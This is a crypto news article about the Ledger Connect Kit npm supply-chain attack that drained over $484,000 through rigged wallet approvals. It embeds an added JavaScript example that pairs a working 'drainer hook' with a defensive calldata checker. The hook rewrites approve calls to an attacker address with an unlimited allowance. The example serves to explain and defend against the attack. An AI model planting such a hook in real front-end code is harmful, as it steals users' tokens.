Ledger Hacker Exploits Web3 Apps, Draining Over $484,000 in Sneaky Scheme
Summary:
On December 14, an attacker drained more than $484,000 from users of several Web3 apps by tricking them into signing malicious token approvals. The attacker phished a former Ledger employee, took over that employee's npm (Node Package Manager) account, and published a malicious version of the Ledger Connect Kit package, which affected apps then served to users' browsers. Zapper, SushiSwap, Phantom, Balancer and Revoke.cash were among the apps affected. The Cyvers team believes the injected code altered the transactions presented to users' wallets, so that victims approved transfers they did not intend. They stress that every transaction confirmation should be read carefully before signing.
On December 14, an attacker referred to as the 'Ledger hacker' took at least $484,000 from users of a range of Web3 applications by tricking them into signing malicious token approvals. According to Cyvers, a blockchain security platform, the attack took place during the morning hours. The attacker used a phishing attack against a former Ledger employee to gain access to that employee's npm account. The malicious version of the Ledger Connect Kit was identified and removed, and a clean version was published shortly afterwards.
With that access, the attacker published a malicious release of the Ledger Connect Kit to npm. Ledger Connect Kit is a widely used package in Web3 applications, and apps that loaded the malicious release served it to their users' browsers. Zapper, SushiSwap, Phantom, Balancer and Revoke.cash were among the affected applications, and through them the attacker drained no less than $484,000. Other apps were likely affected as well, raising concern across the whole Ethereum Virtual Machine (EVM) ecosystem.
Cyvers' CEO Deddy Lavid, CTO Meir Dolev and blockchain analyst Hakal Unal speculated on how the attack worked: the attacker appears to have used the injected code to show misleading transaction details in users' wallets, tricking them into approving transactions they did not intend to.
Developers building Web3 apps typically use open-source 'connect kits' to let the app talk to users' wallets; Ledger's Connect Kit is one such option. When an app is built with Node Package Manager, the kit becomes part of the app's code, which is downloaded to the user's browser when the site is visited. In the Ledger kit's case, a small loader package fetched the current kit build from a CDN at page load, so a malicious release reached visitors of sites that had not rebuilt or redeployed anything, and pinning the dependency version at build time did not protect them.
The code injected into the Ledger Connect Kit presumably allowed the attacker to modify the transactions pushed to the user's wallet. For instance, it may have caused the wallet to show a token approval request whose spender was the attacker's address rather than the app's contract, so that users unwittingly granted the attacker permission to move their tokens.
The Cyvers team cautioned that this kind of attack is hard to avoid because wallets do not always show users a readable description of what they are signing. The team advised scrutinising every transaction confirmation while using an app, even when the transaction is displayed as raw calldata that is hard to read; for an approval request that means checking the spender address and the allowance amount.
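The rewrite described in the two paragraphs above, as an added example that is not part of the article and is not Ledger's or Cyvers' code: a hypothetical drainer hook that wraps the wallet provider's `request` method and swaps the spender of any ERC-20 `approve` call for the attacker's address and the amount for an unlimited allowance, beside the check a user, wallet or browser extension could run on the calldata that actually reaches the wallet. The router, token and attacker addresses are constructed placeholders; only the `approve(address,uint256)` selector `0x095ea7b3` is the real ERC-20 value.

```javascript
// Added example: ERC-20 approve calldata, a hypothetical front-end drainer hook,
// and a decoder that checks what the wallet is really being asked to sign.

const APPROVE_SELECTOR = "0x095ea7b3"; // first 4 bytes of keccak256("approve(address,uint256)")
const MAX_UINT256 = (1n << 256n) - 1n;  // "unlimited" allowance

// Constructed placeholder addresses (not real contracts)
const ROUTER = "0x1111111111111111111111111111111111111111";   // the app's legitimate spender
const TOKEN = "0x3333333333333333333333333333333333333333";    // ERC-20 token being approved
const ATTACKER = "0x2222222222222222222222222222222222222222"; // hypothetical drainer address

const pad32 = (hex) => hex.padStart(64, "0");

// Encode approve(spender, amount) exactly as a dApp SDK would (ABI: selector + 2 x 32-byte words)
function encodeApprove(spender, amount) {
  const addr = spender.toLowerCase().replace(/^0x/, "");
  if (addr.length !== 40) throw new Error("bad address");
  return APPROVE_SELECTOR + pad32(addr) + pad32(BigInt(amount).toString(16));
}

// Decode calldata; returns null if it is not an approve call
function decodeApprove(data) {
  const hex = (data || "").toLowerCase();
  if (!hex.startsWith(APPROVE_SELECTOR) || hex.length !== 10 + 128) return null;
  return {
    spender: "0x" + hex.slice(10 + 24, 10 + 64), // address is right-aligned in its 32-byte word
    amount: BigInt("0x" + hex.slice(74, 138)),
  };
}

// What the legitimate app intends: approve its own router for a bounded amount
function buildSwapApproval(amount) {
  return { to: TOKEN, data: encodeApprove(ROUTER, amount) };
}

// Hypothetical drainer hook: code injected into a front-end dependency wraps
// provider.request and rewrites every approval before the wallet ever sees it.
function installDrainerHook(provider, attacker) {
  const original = provider.request.bind(provider);
  provider.request = (args) => {
    if (args.method === "eth_sendTransaction") {
      const tx = args.params[0];
      if (decodeApprove(tx.data)) tx.data = encodeApprove(attacker, MAX_UINT256);
    }
    return original(args);
  };
}

// Defence: check the calldata that actually reaches the wallet against the
// spenders the user expects for this app, and flag unlimited allowances.
function checkApproval(tx, expectedSpenders) {
  const dec = decodeApprove(tx.data);
  if (!dec) return { ok: true, findings: [], reason: "not an approve call" };
  const allowed = expectedSpenders.map((s) => s.toLowerCase());
  const findings = [];
  if (!allowed.includes(dec.spender)) findings.push(`spender ${dec.spender} is not an expected contract`);
  if (dec.amount === MAX_UINT256) findings.push("unlimited allowance requested");
  return { ok: findings.length === 0, spender: dec.spender, amount: dec.amount, findings };
}

// Stand-in wallet provider that records what it is asked to sign
function makeRecordingProvider() {
  const sent = [];
  return { sent, request: (args) => { sent.push(args); return Promise.resolve("0xtxhash"); } };
}

// Runs the same user action through a clean and a compromised front end
function demo() {
  const clean = makeRecordingProvider();
  clean.request({ method: "eth_sendTransaction", params: [buildSwapApproval(1000n)] });

  const compromised = makeRecordingProvider();
  installDrainerHook(compromised, ATTACKER);
  compromised.request({ method: "eth_sendTransaction", params: [buildSwapApproval(1000n)] });

  return {
    clean: checkApproval(clean.sent[0].params[0], [ROUTER]),
    compromised: checkApproval(compromised.sent[0].params[0], [ROUTER]),
  };
}

console.log(JSON.stringify(demo(), (k, v) => (typeof v === "bigint" ? v.toString() : v), 2));
```

The point of the example is that the UI the app renders and the calldata the wallet signs are produced by different code paths; once a dependency in the page is malicious, only inspection at the wallet boundary (spender, amount, target contract) can catch the substitution, which is the check the Cyvers team recommends making by hand.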
Cyvers says its platform lets businesses check whether specific addresses have been involved in security incidents. The team expects future Web3 tooling to be able to detect and block such attacks, but acknowledged that considerable work remains.
Published At
12/15/2023 2:30:22 AM
Disclaimer: Algoine does not endorse any content or product on this page. Readers should conduct their own research before taking any actions related to the asset, company, or any information in this article and assume full responsibility for their decisions. This article should not be considered as investment advice. Our news is prepared with AI support.